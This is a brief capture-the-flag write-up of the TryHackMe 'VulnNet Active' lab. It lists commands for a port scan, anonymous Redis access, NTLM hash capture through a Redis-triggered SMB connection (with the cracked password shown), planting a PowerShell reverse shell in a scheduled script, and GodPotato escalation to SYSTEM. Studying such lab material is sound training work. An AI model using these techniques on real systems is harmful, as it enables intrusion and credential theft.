TryHackMe - VulnNet Active
VulnNet Active
vulnnetactive
Enumeration
1 | ➜ ~ rustscan -a 10.10.241.222 -- -Pn |
Redis Exploration
Connected to Redis anonymously:
1 | ➜ ~ redis-cli -h 10.10.241.222 -p 6379 |
Exploitation
Capturing NTLM Hash
Used Redis eval to trigger an SMB connection to a local
listener:
1 | # On attacker machine |
Captured and cracked the hash for enterprise-security: -
Password: sand_0873959498
SMB Access
Accessed Enterprise-Share:
1 | ➜ tmp smbclient //10.10.85.177/Enterprise-Share --user enterprise-security%sand_0873959498 |
The script is likely a scheduled task. Modified it to include a PowerShell reverse shell and uploaded it back.
Privilege Escalation
Once a shell was obtained as enterprise-security,
checked privileges:
1 | whoami /priv |
Used GodPotato to escalate to
NT AUTHORITY\SYSTEM:
1 | ./godp4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt" |